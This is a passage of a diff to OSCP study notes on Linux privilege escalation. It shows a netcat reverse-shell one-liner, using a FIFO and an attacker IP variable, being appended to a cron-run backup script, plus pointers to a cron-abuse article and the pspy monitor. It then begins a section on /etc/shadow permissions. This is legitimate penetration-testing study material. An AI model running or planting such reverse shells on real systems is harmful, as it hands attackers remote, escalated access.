A-Pisani/OSCP_notes/Privilege_Escalation.md

 student@debian:/var/scripts$ echo >> user_backups.sh
 student@debian:/var/scripts$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $our_IP 1234 >/tmp/f" >> user_backups.sh
 ```

+> **Note**:
+> Take a look at this resource [Exploiting the cron jobs misconfigurations](https://vk9-sec.com/exploiting-the-cron-jobs-misconfigurations-privilege-escalation/).
+> Use [PsPy](https://github.com/DominicBreuker/pspy) to monitor system processes and undertand how frequently a job is running.
 ### Insecure File Permissions
 #### /etc/shadow Case Study
 - Unless a centralized credential system such as Active Directory or LDAP is used, Linux passwords are generally stored in **`/etc/shadow`**, which is not readable by normal users.